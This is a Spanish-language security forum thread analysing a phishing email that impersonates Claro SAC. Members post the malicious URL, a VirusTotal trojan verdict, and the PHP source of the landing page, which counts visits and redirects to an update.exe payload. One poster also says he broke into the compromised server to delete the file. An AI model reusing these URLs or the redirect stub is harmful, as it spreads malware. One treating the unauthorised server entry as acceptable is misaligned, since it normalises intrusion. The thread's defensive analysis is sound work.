Claro SAC Recibiste nuevo mensaje multimedia

[carlosgalli]

Les dejo un mail que recibí en mi bandeja de entrada de Gmail, que luego mande a Spam, notificandolo como tal, que para mí es sospechoso.

Si clicleara para ver el mensaje multimedia me enviaría al siguiente dirección (No clicklear ni pegar en el navegador si no se sabe lo que se está haciendo)

Código: Seleccionar todo

http://www.obrh.org/forms/use/unizar/files/index.php

Se los dejo para su analisis, un afectuoso saludo! Carlos Galli

[Alejandro]

Gracias Carlos y bienvenido!

Un troyano sin dudas y por el momento con baja detección: https://www.virustotal.com/file/0cc0178 ... 344908917/

En relación a esto, por acá se comenta un caso similar con algunos detalles del archivo analizado: http://oberheimdmx.blogspot.com/2012/08 ... claro.html

[carlosgalli]

Gracias por la respuesta y por la bienvenida Alejandro, saludos desde Argentina!

[rehizner]

A mi me llego hoy ese correo, le segui la ruta y me intento bajar un archivo update.exe, el codigo fuente de "http://www.obrh.org/forms/use/unizar/files/index.php" es:
<?
#--------------------------------------#
# http://www.lawebdelprogramador.com #
#--------------------------------------#
//determin la direccion de descarga
$url_descarga="http://www.obrh.org/forms/use/unizar/files/update.exe";

if (is_writeable("c.txt"))
{
$arrayfichero=file("c.txt");
$arrayfichero[0]++;
$fichero=fopen("c.txt","w");
$grabar=fwrite($fichero,$arrayfichero[0]);
$cerrar=fclose($fichero);
}
header("location:$url_descarga");
?>

Logre entrar al server probablemente de una manera similar a la que utilizo el atacante para poner el archivo malicioso asi que procedere a eliminarlo para evitar infecciones.

[Alejandro]

Gracias por la info, ahí lo estaba viendo... ahora sale un "404 Error File Not Found" si no se actualiza.